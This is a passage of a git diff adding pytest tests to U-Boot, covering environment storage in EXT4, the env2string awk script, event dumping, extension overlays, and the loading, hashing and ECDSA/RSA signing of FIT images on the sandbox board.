u_boot_utils.run_and_log(c, ['cp', '-f', persistent, fs_img]) + return fs_img + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('cmd_nvedit_info') +@pytest.mark.buildconfigspec('cmd_nvedit_load') +@pytest.mark.buildconfigspec('cmd_nvedit_select') +@pytest.mark.buildconfigspec('env_is_in_ext4') +def test_env_ext4(state_test_env): + + """Test ENV in EXT4 on sandbox.""" + c = state_test_env.u_boot_console + fs_img = '' + try: + fs_img = mk_env_ext4(state_test_env) + + c.run_command('host bind 0 %s' % fs_img) + + response = c.run_command('ext4ls host 0:0') + assert 'uboot.env' not in response + + # force env location: EXT4 (prio 1 in sandbox) + response = c.run_command('env select EXT4') + assert 'Select Environment on EXT4: OK' in 
response + + response = c.run_command('env save') + assert 'Saving Environment to EXT4' in response + + response = c.run_command('env load') + assert 'Loading Environment from EXT4... OK' in response + + response = c.run_command('ext4ls host 0:0') + assert '8192 uboot.env' in response + + response = c.run_command('env info') + assert 'env_valid = valid' in response + assert 'env_ready = true' in response + assert 'env_use_default = false' in response + + response = c.run_command('env info -p -d') + assert 'Environment was loaded from persistent storage' in response + assert 'Environment can be persisted' in response + + response = c.run_command('env info -d -q') + assert response == "" + response = c.run_command('echo $?') + assert response == "1" + + response = c.run_command('env info -p -q') + assert response == "" + response = c.run_command('echo $?') + assert response == "0" + + response = c.run_command('env erase') + assert 'OK' in response + + response = c.run_command('env load') + assert 'Loading Environment from EXT4... ' in response + assert 'bad CRC, using default environment' in response + + response = c.run_command('env info') + assert 'env_valid = invalid' in response + assert 'env_ready = true' in response + assert 'env_use_default = true' in response + + response = c.run_command('env info -p -d') + assert 'Default environment is used' in response + assert 'Environment can be persisted' in response + + # restore env location: NOWHERE (prio 0 in sandbox) + response = c.run_command('env select nowhere') + assert 'Select Environment on nowhere: OK' in response + + response = c.run_command('env load') + assert 'Loading Environment from nowhere... OK' in response + + response = c.run_command('env info') + assert 'env_valid = invalid' in response + assert 'env_ready = true' in response + assert 'env_use_default = true' in response + + response = c.run_command('env info -p -d') + assert 'Default environment is used' in response + assert 'Environment cannot be persisted' in response + + finally: + if fs_img: + call('rm -f %s' % fs_img, shell=True) + +def test_env_text(u_boot_console): + """Test the script that converts the environment to a text file""" + + def check_script(intext, expect_val): + """Check a test case + + Args: + intext: Text to pass to the script + expect_val: Expected value of the CONFIG_EXTRA_ENV_TEXT string, or + None if we expect it not to be defined + """ + with tempfile.TemporaryDirectory() as path: + fname = os.path.join(path, 'infile') + with open(fname, 'w') as inf: + print(intext, file=inf) + result = u_boot_utils.run_and_log(cons, ['awk', '-f', script, fname]) + if expect_val is not None: + expect = '#define CONFIG_EXTRA_ENV_TEXT "%s"\n' % expect_val + assert result == expect + else: + assert result == '' + + cons = u_boot_console + script = os.path.join(cons.config.source_dir, 'scripts', 'env2string.awk') + + # simple script with a single var + check_script('fred=123', 'fred=123\\0') + + # no vars + check_script('', None) + + # two vars + check_script('''fred=123 +mary=456''', 'fred=123\\0mary=456\\0') + + # blank lines + check_script('''fred=123 + + +mary=456 + +''', 'fred=123\\0mary=456\\0') + + # append + check_script('''fred=123 +mary=456 +fred+= 456''', 'fred=123 456\\0mary=456\\0') + + # append from empty + check_script('''fred= +mary=456 +fred+= 456''', 'fred= 456\\0mary=456\\0') + + # variable with + in it + check_script('fred+mary=123', 'fred+mary=123\\0') + + # ignores variables that are empty + check_script('''fred= +fred+= +mary=456''', 
'mary=456\\0')
+
+    # single-character env name
+    check_script('''m=123
+e=456
+m+= 456''', 'e=456\\0m=123 456\\0')
+
+    # contains quotes
+    check_script('''fred="my var"
+mary=another"''', 'fred=\\"my var\\"\\0mary=another\\"\\0')
+
+    # variable name ending in +
+    check_script('''fred\\+=my var
+fred++= again''', 'fred+=my var again\\0')
+
+    # variable name containing +
+    check_script('''fred+jane=both
+fred+jane+=again
+mary=456''', 'fred+jane=bothagain\\0mary=456\\0')
+
+    # multi-line vars - new vars always start at column 1
+    check_script('''fred=first
+ second
+\tthird with tab
+
+ after blank
+ confusing=oops
+mary=another"''', 'fred=first second third with tab after blank confusing=oops\\0mary=another\\"\\0')
+
+    # real-world example
+    check_script('''ubifs_boot=
+ env exists bootubipart ||
+ env set bootubipart UBI;
+ env exists bootubivol ||
+ env set bootubivol boot;
+ if ubi part ${bootubipart} &&
+ ubifsmount ubi${devnum}:${bootubivol};
+ then
+ devtype=ubi;
+ run scan_dev_for_boot;
+ fi
+''',
+        'ubifs_boot=env exists bootubipart || env set bootubipart UBI; '
+        'env exists bootubivol || env set bootubivol boot; '
+        'if ubi part ${bootubipart} && ubifsmount ubi${devnum}:${bootubivol}; '
+        'then devtype=ubi; run scan_dev_for_boot; fi\\0')
diff --git a/test/py/tests/test_event_dump.py b/test/py/tests/test_event_dump.py
new file mode 100644
index 00000000000..e282c67335c
--- /dev/null
+++ b/test/py/tests/test_event_dump.py
@@ -0,0 +1,24 @@
+# SPDX-License-Identifier: GPL-2.0+
+# Copyright 2021 Google LLC
+# Written by Simon Glass <sjg@chromium.org>
+
+import pytest
+import re
+import u_boot_utils as util
+
+# This is only a partial test - covering 64-bit sandbox. It does not test
+# big-endian images, nor 32-bit images
+@pytest.mark.boardspec('sandbox')
+def test_event_dump(u_boot_console):
+    """Test that scripts/event_dump.py reports the expected static events."""
+    cons = u_boot_console
+    sandbox = cons.config.build_dir + '/u-boot'
+    out = util.run_and_log(cons, ['scripts/event_dump.py', sandbox])
+    expect = '''.*Event type Id Source location
+-------------------- ------------------------------ ------------------------------
+EVT_FT_FIXUP bootmeth_vbe_ft_fixup .*boot/vbe_request.c:.*
+EVT_FT_FIXUP bootmeth_vbe_simple_ft_fixup .*boot/vbe_simple_os.c:.*
+EVT_LAST_STAGE_INIT install_smbios_table .*lib/efi_loader/efi_smbios.c:.*
+EVT_MISC_INIT_F sandbox_early_getopt_check .*arch/sandbox/cpu/start.c:.*
+EVT_TEST h_adder_simple .*test/common/event.c:'''
+    assert re.match(expect, out, re.MULTILINE) is not None
diff --git a/test/py/tests/test_extension.py b/test/py/tests/test_extension.py
new file mode 100644
index 00000000000..267cf2ff27c
--- /dev/null
+++ b/test/py/tests/test_extension.py
@@ -0,0 +1,53 @@
+# SPDX-License-Identifier: GPL-2.0+
+# Copyright (c) 2020
+# Author: Kory Maincent <kory.maincent@bootlin.com>
+
+# Test U-Boot's "extension" commands.
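+#
+# On sandbox, 'extension scan' is expected to report two extension boards;
+# their overlays (overlay0.dtbo and overlay1.dtbo) are loaded from
+# arch/sandbox/dts/ in the build directory and applied on top of the
+# devicetree previously loaded at $fdt_addr_r.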
+ +import os +import pytest +import u_boot_utils + +overlay_addr = 0x1000 + +SANDBOX_DTB='arch/sandbox/dts/sandbox.dtb' +OVERLAY_DIR='arch/sandbox/dts/' + +def load_dtb(u_boot_console): + u_boot_console.log.action('Loading devicetree to RAM...') + u_boot_console.run_command('host load hostfs - $fdt_addr_r %s' % (os.path.join(u_boot_console.config.build_dir, SANDBOX_DTB))) + u_boot_console.run_command('fdt addr $fdt_addr_r') + +@pytest.mark.buildconfigspec('cmd_fdt') +@pytest.mark.boardspec('sandbox') +def test_extension(u_boot_console): + """Test the 'extension' command.""" + + load_dtb(u_boot_console) + + output = u_boot_console.run_command('extension list') + assert('No extension' in output) + + output = u_boot_console.run_command('extension scan') + assert output == 'Found 2 extension board(s).' + + output = u_boot_console.run_command('extension list') + assert('overlay0.dtbo' in output) + assert('overlay1.dtbo' in output) + + u_boot_console.run_command_list([ + 'setenv extension_overlay_addr %s' % (overlay_addr), + 'setenv extension_overlay_cmd \'host load hostfs - ${extension_overlay_addr} %s${extension_overlay_name}\'' % (os.path.join(u_boot_console.config.build_dir, OVERLAY_DIR))]) + + output = u_boot_console.run_command('extension apply 0') + assert('bytes read' in output) + + output = u_boot_console.run_command('fdt print') + assert('button3' in output) + + output = u_boot_console.run_command('extension apply all') + assert('bytes read' in output) + + output = u_boot_console.run_command('fdt print') + assert('button4' in output) + diff --git a/test/py/tests/test_fit.py b/test/py/tests/test_fit.py new file mode 100755 index 00000000000..8f9c4b26411 --- /dev/null +++ b/test/py/tests/test_fit.py @@ -0,0 +1,410 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2013, Google Inc. 
+# +# Sanity check of the FIT handling in U-Boot + +import os +import pytest +import struct +import u_boot_utils as util +import fit_util + +# Define a base ITS which we can adjust using % and a dictionary +base_its = ''' +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel-1 { + data = /incbin/("%(kernel)s"); + type = "kernel"; + arch = "sandbox"; + os = "linux"; + compression = "%(compression)s"; + load = <0x40000>; + entry = <0x8>; + }; + kernel-2 { + data = /incbin/("%(loadables1)s"); + type = "kernel"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + %(loadables1_load)s + entry = <0x0>; + }; + fdt-1 { + description = "snow"; + data = /incbin/("%(fdt)s"); + type = "flat_dt"; + arch = "sandbox"; + %(fdt_load)s + compression = "%(compression)s"; + signature-1 { + algo = "sha1,rsa2048"; + key-name-hint = "dev"; + }; + }; + ramdisk-1 { + description = "snow"; + data = /incbin/("%(ramdisk)s"); + type = "ramdisk"; + arch = "sandbox"; + os = "linux"; + %(ramdisk_load)s + compression = "%(compression)s"; + }; + ramdisk-2 { + description = "snow"; + data = /incbin/("%(loadables2)s"); + type = "ramdisk"; + arch = "sandbox"; + os = "linux"; + %(loadables2_load)s + compression = "none"; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel-1"; + fdt = "fdt-1"; + %(ramdisk_config)s + %(loadables_config)s + }; + }; +}; +''' + +# Define a base FDT - currently we don't use anything in this +base_fdt = ''' +/dts-v1/; + +/ { + #address-cells = <1>; + #size-cells = <0>; + + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + + binman { + }; + + reset@0 { + compatible = "sandbox,reset"; + reg = <0>; + }; +}; +''' + +# This is the U-Boot script that is run for each test. First load the FIT, +# then run the 'bootm' command, then save out memory from the places where +# we expect 'bootm' to write things. Then quit. 
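+# The %(name)s and %(name)x placeholders below are filled in from the
+# 'params' dictionary that run_fit_test() builds for each scenario.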
+base_script = ''' +host load hostfs 0 %(fit_addr)x %(fit)s +fdt addr %(fit_addr)x +bootm start %(fit_addr)x +bootm loados +host save hostfs 0 %(kernel_addr)x %(kernel_out)s %(kernel_size)x +host save hostfs 0 %(fdt_addr)x %(fdt_out)s %(fdt_size)x +host save hostfs 0 %(ramdisk_addr)x %(ramdisk_out)s %(ramdisk_size)x +host save hostfs 0 %(loadables1_addr)x %(loadables1_out)s %(loadables1_size)x +host save hostfs 0 %(loadables2_addr)x %(loadables2_out)s %(loadables2_size)x +''' + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('dtc') +def test_fit(u_boot_console): + def make_fname(leaf): + """Make a temporary filename + + Args: + leaf: Leaf name of file to create (within temporary directory) + Return: + Temporary filename + """ + return os.path.join(cons.config.build_dir, leaf) + + def filesize(fname): + """Get the size of a file + + Args: + fname: Filename to check + Return: + Size of file in bytes + """ + return os.stat(fname).st_size + + def read_file(fname): + """Read the contents of a file + + Args: + fname: Filename to read + Returns: + Contents of file as a string + """ + with open(fname, 'rb') as fd: + return fd.read() + + def make_ramdisk(filename, text): + """Make a sample ramdisk with test data + + Returns: + Filename of ramdisk created + """ + fname = make_fname(filename) + data = '' + for i in range(100): + data += '%s %d was seldom used in the middle ages\n' % (text, i) + with open(fname, 'w') as fd: + print(data, file=fd) + return fname + + def make_compressed(filename): + util.run_and_log(cons, ['gzip', '-f', '-k', filename]) + return filename + '.gz' + + def find_matching(text, match): + """Find a match in a line of text, and return the unmatched line portion + + This is used to extract a part of a line from some text. The match string + is used to locate the line - we use the first line that contains that + match text. + + Once we find a match, we discard the match string itself from the line, + and return what remains. + + TODO: If this function becomes more generally useful, we could change it + to use regex and return groups. + + Args: + text: Text to check (list of strings, one for each command issued) + match: String to search for + Return: + String containing unmatched portion of line + Exceptions: + ValueError: If match is not found + + >>> find_matching(['first line:10', 'second_line:20'], 'first line:') + '10' + >>> find_matching(['first line:10', 'second_line:20'], 'second line') + Traceback (most recent call last): + ... + ValueError: Test aborted + >>> find_matching('first line:10\', 'second_line:20'], 'second_line:') + '20' + >>> find_matching('first line:10\', 'second_line:20\nthird_line:30'], + 'third_line:') + '30' + """ + __tracebackhide__ = True + for line in '\n'.join(text).splitlines(): + pos = line.find(match) + if pos != -1: + return line[:pos] + line[pos + len(match):] + + pytest.fail("Expected '%s' but not found in output") + + def check_equal(expected_fname, actual_fname, failure_msg): + """Check that a file matches its expected contents + + This is always used on out-buffers whose size is decided by the test + script anyway, which in some cases may be larger than what we're + actually looking for. So it's safe to truncate it to the size of the + expected data. 
+ + Args: + expected_fname: Filename containing expected contents + actual_fname: Filename containing actual contents + failure_msg: Message to print on failure + """ + expected_data = read_file(expected_fname) + actual_data = read_file(actual_fname) + if len(expected_data) < len(actual_data): + actual_data = actual_data[:len(expected_data)] + assert expected_data == actual_data, failure_msg + + def check_not_equal(expected_fname, actual_fname, failure_msg): + """Check that a file does not match its expected contents + + Args: + expected_fname: Filename containing expected contents + actual_fname: Filename containing actual contents + failure_msg: Message to print on failure + """ + expected_data = read_file(expected_fname) + actual_data = read_file(actual_fname) + assert expected_data != actual_data, failure_msg + + def run_fit_test(mkimage): + """Basic sanity check of FIT loading in U-Boot + + TODO: Almost everything: + - hash algorithms - invalid hash/contents should be detected + - signature algorithms - invalid sig/contents should be detected + - compression + - checking that errors are detected like: + - image overwriting + - missing images + - invalid configurations + - incorrect os/arch/type fields + - empty data + - images too large/small + - invalid FDT (e.g. putting a random binary in instead) + - default configuration selection + - bootm command line parameters should have desired effect + - run code coverage to make sure we are testing all the code + """ + # Set up invariant files + control_dtb = fit_util.make_dtb(cons, base_fdt, 'u-boot') + kernel = fit_util.make_kernel(cons, 'test-kernel.bin', 'kernel') + ramdisk = make_ramdisk('test-ramdisk.bin', 'ramdisk') + loadables1 = fit_util.make_kernel(cons, 'test-loadables1.bin', 'lenrek') + loadables2 = make_ramdisk('test-loadables2.bin', 'ksidmar') + kernel_out = make_fname('kernel-out.bin') + fdt = make_fname('u-boot.dtb') + fdt_out = make_fname('fdt-out.dtb') + ramdisk_out = make_fname('ramdisk-out.bin') + loadables1_out = make_fname('loadables1-out.bin') + loadables2_out = make_fname('loadables2-out.bin') + + # Set up basic parameters with default values + params = { + 'fit_addr' : 0x1000, + + 'kernel' : kernel, + 'kernel_out' : kernel_out, + 'kernel_addr' : 0x40000, + 'kernel_size' : filesize(kernel), + + 'fdt' : fdt, + 'fdt_out' : fdt_out, + 'fdt_addr' : 0x80000, + 'fdt_size' : filesize(control_dtb), + 'fdt_load' : '', + + 'ramdisk' : ramdisk, + 'ramdisk_out' : ramdisk_out, + 'ramdisk_addr' : 0xc0000, + 'ramdisk_size' : filesize(ramdisk), + 'ramdisk_load' : '', + 'ramdisk_config' : '', + + 'loadables1' : loadables1, + 'loadables1_out' : loadables1_out, + 'loadables1_addr' : 0x100000, + 'loadables1_size' : filesize(loadables1), + 'loadables1_load' : '', + + 'loadables2' : loadables2, + 'loadables2_out' : loadables2_out, + 'loadables2_addr' : 0x140000, + 'loadables2_size' : filesize(loadables2), + 'loadables2_load' : '', + + 'loadables_config' : '', + 'compression' : 'none', + } + + # Make a basic FIT and a script to load it + fit = fit_util.make_fit(cons, mkimage, base_its, params) + params['fit'] = fit + cmd = base_script % params + + # First check that we can load a kernel + # We could perhaps reduce duplication with some loss of readability + cons.config.dtb = control_dtb + cons.restart_uboot() + with cons.log.section('Kernel load'): + output = cons.run_command_list(cmd.splitlines()) + check_equal(kernel, kernel_out, 'Kernel not loaded') + check_not_equal(control_dtb, fdt_out, + 'FDT loaded but should be ignored') + 
check_not_equal(ramdisk, ramdisk_out, + 'Ramdisk loaded but should not be') + + # Find out the offset in the FIT where U-Boot has found the FDT + line = find_matching(output, 'Booting using the fdt blob at ') + fit_offset = int(line, 16) - params['fit_addr'] + fdt_magic = struct.pack('>L', 0xd00dfeed) + data = read_file(fit) + + # Now find where it actually is in the FIT (skip the first word) + real_fit_offset = data.find(fdt_magic, 4) + assert fit_offset == real_fit_offset, ( + 'U-Boot loaded FDT from offset %#x, FDT is actually at %#x' % + (fit_offset, real_fit_offset)) + + # Check if bootargs strings substitution works + output = cons.run_command_list([ + 'env set bootargs \\\"\'my_boot_var=${foo}\'\\\"', + 'env set foo bar', + 'bootm prep', + 'env print bootargs']) + assert 'bootargs="my_boot_var=bar"' in output, "Bootargs strings not substituted" + + # Now a kernel and an FDT + with cons.log.section('Kernel + FDT load'): + params['fdt_load'] = 'load = <%#x>;' % params['fdt_addr'] + fit = fit_util.make_fit(cons, mkimage, base_its, params) + cons.restart_uboot() + output = cons.run_command_list(cmd.splitlines()) + check_equal(kernel, kernel_out, 'Kernel not loaded') + check_equal(control_dtb, fdt_out, 'FDT not loaded') + check_not_equal(ramdisk, ramdisk_out, + 'Ramdisk loaded but should not be') + + # Try a ramdisk + with cons.log.section('Kernel + FDT + Ramdisk load'): + params['ramdisk_config'] = 'ramdisk = "ramdisk-1";' + params['ramdisk_load'] = 'load = <%#x>;' % params['ramdisk_addr'] + fit = fit_util.make_fit(cons, mkimage, base_its, params) + cons.restart_uboot() + output = cons.run_command_list(cmd.splitlines()) + check_equal(ramdisk, ramdisk_out, 'Ramdisk not loaded') + + # Configuration with some Loadables + with cons.log.section('Kernel + FDT + Ramdisk load + Loadables'): + params['loadables_config'] = 'loadables = "kernel-2", "ramdisk-2";' + params['loadables1_load'] = ('load = <%#x>;' % + params['loadables1_addr']) + params['loadables2_load'] = ('load = <%#x>;' % + params['loadables2_addr']) + fit = fit_util.make_fit(cons, mkimage, base_its, params) + cons.restart_uboot() + output = cons.run_command_list(cmd.splitlines()) + check_equal(loadables1, loadables1_out, + 'Loadables1 (kernel) not loaded') + check_equal(loadables2, loadables2_out, + 'Loadables2 (ramdisk) not loaded') + + # Kernel, FDT and Ramdisk all compressed + with cons.log.section('(Kernel + FDT + Ramdisk) compressed'): + params['compression'] = 'gzip' + params['kernel'] = make_compressed(kernel) + params['fdt'] = make_compressed(fdt) + params['ramdisk'] = make_compressed(ramdisk) + fit = fit_util.make_fit(cons, mkimage, base_its, params) + cons.restart_uboot() + output = cons.run_command_list(cmd.splitlines()) + check_equal(kernel, kernel_out, 'Kernel not loaded') + check_equal(control_dtb, fdt_out, 'FDT not loaded') + check_not_equal(ramdisk, ramdisk_out, 'Ramdisk got decompressed?') + check_equal(ramdisk + '.gz', ramdisk_out, 'Ramdist not loaded') + + + cons = u_boot_console + # We need to use our own device tree file. Remember to restore it + # afterwards. + old_dtb = cons.config.dtb + try: + mkimage = cons.config.build_dir + '/tools/mkimage' + run_fit_test(mkimage) + finally: + # Go back to the original U-Boot with the correct dtb. 
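+        # (restart_uboot() below starts sandbox again with this restored dtb)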
+ cons.config.dtb = old_dtb + cons.restart_uboot() diff --git a/test/py/tests/test_fit_auto_signed.py b/test/py/tests/test_fit_auto_signed.py new file mode 100644 index 00000000000..9ea3351619f --- /dev/null +++ b/test/py/tests/test_fit_auto_signed.py @@ -0,0 +1,195 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2022 Massimo Pegorer + +""" +Test that mkimage generates auto-FIT with signatures and/or hashes as expected. + +The mkimage tool can create auto generated (i.e. without an ITS file +provided as input) FIT in three different flavours: with crc32 checksums +of 'images' subnodes; with signatures of 'images' subnodes; with sha1 +hashes of 'images' subnodes and signatures of 'configurations' subnodes. +This test verifies that auto-FIT are generated as expected, in all of +the three flavours, including check of hashes and signatures (except for +configurations ones). + +The test does not run the sandbox. It only checks the host tool mkimage. +""" + +import os +import pytest +import u_boot_utils as util +import binascii +from Cryptodome.Hash import SHA1 +from Cryptodome.Hash import SHA256 +from Cryptodome.PublicKey import RSA +from Cryptodome.Signature import pkcs1_15 + +class SignedFitHelper(object): + """Helper to manipulate a FIT with signed/hashed images/configs.""" + def __init__(self, cons, file_name): + self.fit = file_name + self.cons = cons + self.images_nodes = set() + self.confgs_nodes = set() + + def __fdt_list(self, path): + return util.run_and_log(self.cons, + f'fdtget -l {self.fit} {path}') + + def __fdt_get_string(self, node, prop): + return util.run_and_log(self.cons, + f'fdtget -ts {self.fit} {node} {prop}') + + def __fdt_get_binary(self, node, prop): + numbers = util.run_and_log(self.cons, + f'fdtget -tbi {self.fit} {node} {prop}') + + bignum = bytearray() + for little_num in numbers.split(): + bignum.append(int(little_num)) + + return bignum + + def build_nodes_sets(self): + """Fill sets with FIT images and configurations subnodes.""" + for node in self.__fdt_list('/images').split(): + subnode = f'/images/{node}' + self.images_nodes.add(subnode) + + for node in self.__fdt_list('/configurations').split(): + subnode = f'/configurations/{node}' + self.confgs_nodes.add(subnode) + + return len(self.images_nodes) + len(self.confgs_nodes) + + def check_fit_crc32_images(self): + """Test that all images in the set are hashed as expected. + + Each image must have an hash with algo=crc32 and hash value must match + the one calculated over image data. + """ + for node in self.images_nodes: + algo = self.__fdt_get_string(f'{node}/hash', 'algo') + assert algo == "crc32\n", "Missing expected crc32 image hash!" + + raw_crc32 = self.__fdt_get_binary(f'{node}/hash', 'value') + raw_bin = self.__fdt_get_binary(node, 'data') + assert raw_crc32 == (binascii.crc32(raw_bin) & + 0xffffffff).to_bytes(4, 'big'), "Wrong crc32 hash!" + + def check_fit_signed_images(self, key_name, sign_algo, verifier): + """Test that all images in the set are signed as expected. + + Each image must have a signature with: key-name-hint matching key_name + argument; algo matching sign_algo argument; value matching the one + calculated over image data using verifier argument. + """ + for node in self.images_nodes: + hint = self.__fdt_get_string(f'{node}/signature', 'key-name-hint') + assert hint == key_name + "\n", "Missing expected key name hint!" + algo = self.__fdt_get_string(f'{node}/signature', 'algo') + assert algo == sign_algo + "\n", "Missing expected signature algo!" 
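+            # The signature value itself is checked below: the SHA-256 digest
+            # of the image data is recomputed and passed to the pkcs1_15
+            # verifier, which raises ValueError on mismatch.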
+ + raw_sig = self.__fdt_get_binary(f'{node}/signature', 'value') + raw_bin = self.__fdt_get_binary(node, 'data') + verifier.verify(SHA256.new(raw_bin), bytes(raw_sig)) + + def check_fit_signed_confgs(self, key_name, sign_algo): + """Test that all configs are signed, and images hashed, as expected. + + Each image must have an hash with algo=sha1 and hash value must match + the one calculated over image data. Each configuration must have a + signature with key-name-hint matching key_name argument and algo + matching sign_algo argument. + TODO: configurations signature checking. + """ + for node in self.images_nodes: + algo = self.__fdt_get_string(f'{node}/hash', 'algo') + assert algo == "sha1\n", "Missing expected sha1 image hash!" + + raw_hash = self.__fdt_get_binary(f'{node}/hash', 'value') + raw_bin = self.__fdt_get_binary(node, 'data') + assert raw_hash == SHA1.new(raw_bin).digest(), "Wrong sha1 hash!" + + for node in self.confgs_nodes: + hint = self.__fdt_get_string(f'{node}/signature', 'key-name-hint') + assert hint == key_name + "\n", "Missing expected key name hint!" + algo = self.__fdt_get_string(f'{node}/signature', 'algo') + assert algo == sign_algo + "\n", "Missing expected signature algo!" + + +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('fdtget') +def test_fit_auto_signed(u_boot_console): + """Test that mkimage generates auto-FIT with signatures/hashes as expected. + + The mkimage tool can create auto generated (i.e. without an ITS file + provided as input) FIT in three different flavours: with crc32 checksums + of 'images' subnodes; with signatures of 'images' subnodes; with sha1 + hashes of 'images' subnodes and signatures of 'configurations' subnodes. + This test verifies that auto-FIT are generated as expected, in all of + the three flavours, including check of hashes and signatures (except for + configurations ones). + + The test does not run the sandbox. It only checks the host tool mkimage. 
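+    The three flavours correspond to invoking mkimage with '-fauto', with
+    '-fauto' plus the signing arguments ('-k', '-g', '-o'), and with
+    '-fauto-conf'.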
+ """ + cons = u_boot_console + mkimage = cons.config.build_dir + '/tools/mkimage' + tempdir = os.path.join(cons.config.result_dir, 'auto_fit') + os.makedirs(tempdir, exist_ok=True) + kernel_file = f'{tempdir}/vmlinuz' + dt1_file = f'{tempdir}/dt-1.dtb' + dt2_file = f'{tempdir}/dt-2.dtb' + key_name = 'sign-key' + sign_algo = 'sha256,rsa4096' + key_file = f'{tempdir}/{key_name}.key' + fit_file = f'{tempdir}/test.fit' + + # Create a fake kernel image and two dtb files with random data + with open(kernel_file, 'wb') as fd: + fd.write(os.urandom(512)) + + with open(dt1_file, 'wb') as fd: + fd.write(os.urandom(256)) + + with open(dt2_file, 'wb') as fd: + fd.write(os.urandom(256)) + + # Create 4096 RSA key and write to file to be read by mkimage + key = RSA.generate(bits=4096) + verifier = pkcs1_15.new(key) + + with open(key_file, 'w') as fd: + fd.write(str(key.export_key(format='PEM').decode('ascii'))) + + b_args = " -d" + kernel_file + " -b" + dt1_file + " -b" + dt2_file + s_args = " -k" + tempdir + " -g" + key_name + " -o" + sign_algo + + # 1 - Create auto FIT with images crc32 checksum, and verify it + util.run_and_log(cons, mkimage + ' -fauto' + b_args + " " + fit_file) + + fit = SignedFitHelper(cons, fit_file) + if fit.build_nodes_sets() == 0: + raise ValueError('FIT-1 has no "/image" nor "/configuration" nodes') + + fit.check_fit_crc32_images() + + # 2 - Create auto FIT with signed images, and verify it + util.run_and_log(cons, mkimage + ' -fauto' + b_args + s_args + " " + + fit_file) + + fit = SignedFitHelper(cons, fit_file) + if fit.build_nodes_sets() == 0: + raise ValueError('FIT-2 has no "/image" nor "/configuration" nodes') + + fit.check_fit_signed_images(key_name, sign_algo, verifier) + + # 3 - Create auto FIT with signed configs and hashed images, and verify it + util.run_and_log(cons, mkimage + ' -fauto-conf' + b_args + s_args + " " + + fit_file) + + fit = SignedFitHelper(cons, fit_file) + if fit.build_nodes_sets() == 0: + raise ValueError('FIT-3 has no "/image" nor "/configuration" nodes') + + fit.check_fit_signed_confgs(key_name, sign_algo) diff --git a/test/py/tests/test_fit_ecdsa.py b/test/py/tests/test_fit_ecdsa.py new file mode 100644 index 00000000000..cc6c0c4dc42 --- /dev/null +++ b/test/py/tests/test_fit_ecdsa.py @@ -0,0 +1,113 @@ +# SPDX-License-Identifier: GPL-2.0+ +# +# Copyright (c) 2020,2021 Alexandru Gagniuc <mr.nuke.me@gmail.com> + +""" +Test ECDSA signing of FIT images + +This test uses mkimage to sign an existing FIT image with an ECDSA key. The +signature is then extracted, and verified against pyCryptodome. +This test doesn't run the sandbox. 
It only checks the host tool 'mkimage' +""" + +import os +import pytest +import u_boot_utils as util +from Cryptodome.Hash import SHA256 +from Cryptodome.PublicKey import ECC +from Cryptodome.Signature import DSS + +class SignableFitImage(object): + """ Helper to manipulate a FIT image on disk """ + def __init__(self, cons, file_name): + self.fit = file_name + self.cons = cons + self.signable_nodes = set() + + def __fdt_list(self, path): + return util.run_and_log(self.cons, f'fdtget -l {self.fit} {path}') + + def __fdt_set(self, node, **prop_value): + for prop, value in prop_value.items(): + util.run_and_log(self.cons, f'fdtput -ts {self.fit} {node} {prop} {value}') + + def __fdt_get_binary(self, node, prop): + numbers = util.run_and_log(self.cons, f'fdtget -tbi {self.fit} {node} {prop}') + + bignum = bytearray() + for little_num in numbers.split(): + bignum.append(int(little_num)) + + return bignum + + def find_signable_image_nodes(self): + for node in self.__fdt_list('/images').split(): + image = f'/images/{node}' + if 'signature' in self.__fdt_list(image): + self.signable_nodes.add(image) + + return self.signable_nodes + + def change_signature_algo_to_ecdsa(self): + for image in self.signable_nodes: + self.__fdt_set(f'{image}/signature', algo='sha256,ecdsa256') + + def sign(self, mkimage, key_file): + util.run_and_log(self.cons, [mkimage, '-F', self.fit, f'-G{key_file}']) + + def check_signatures(self, key): + for image in self.signable_nodes: + raw_sig = self.__fdt_get_binary(f'{image}/signature', 'value') + raw_bin = self.__fdt_get_binary(image, 'data') + + sha = SHA256.new(raw_bin) + verifier = DSS.new(key, 'fips-186-3') + verifier.verify(sha, bytes(raw_sig)) + + +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('dtc') +@pytest.mark.requiredtool('fdtget') +@pytest.mark.requiredtool('fdtput') +def test_fit_ecdsa(u_boot_console): + """ Test that signatures generated by mkimage are legible. 
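+
+    For illustration only, the signature produced by mkimage is read back as a
+    list of byte values with fdtget, roughly:
+
+        fdtget -tbi test.fit /images/<image-node>/signature value
+
+    where <image-node> is a placeholder for whichever node names the ITS file
+    defines; pyCryptodome then verifies those bytes against the generated key.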
""" + def generate_ecdsa_key(): + return ECC.generate(curve='prime256v1') + + def assemble_fit_image(dest_fit, its, destdir): + dtc_args = f'-I dts -O dtb -i {destdir}' + util.run_and_log(cons, [mkimage, '-D', dtc_args, '-f', its, dest_fit]) + + def dtc(dts): + dtb = dts.replace('.dts', '.dtb') + util.run_and_log(cons, f'dtc {datadir}/{dts} -O dtb -o {tempdir}/{dtb}') + + cons = u_boot_console + mkimage = cons.config.build_dir + '/tools/mkimage' + datadir = cons.config.source_dir + '/test/py/tests/vboot/' + tempdir = os.path.join(cons.config.result_dir, 'ecdsa') + os.makedirs(tempdir, exist_ok=True) + key_file = f'{tempdir}/ecdsa-test-key.pem' + fit_file = f'{tempdir}/test.fit' + dtc('sandbox-kernel.dts') + + key = generate_ecdsa_key() + + # Create a fake kernel image -- zeroes will do just fine + with open(f'{tempdir}/test-kernel.bin', 'w') as fd: + fd.write(500 * chr(0)) + + # invocations of mkimage expect to read the key from disk + with open(key_file, 'w') as f: + f.write(key.export_key(format='PEM')) + + assemble_fit_image(fit_file, f'{datadir}/sign-images-sha256.its', tempdir) + + fit = SignableFitImage(cons, fit_file) + nodes = fit.find_signable_image_nodes() + if len(nodes) == 0: + raise ValueError('FIT image has no "/image" nodes with "signature"') + + 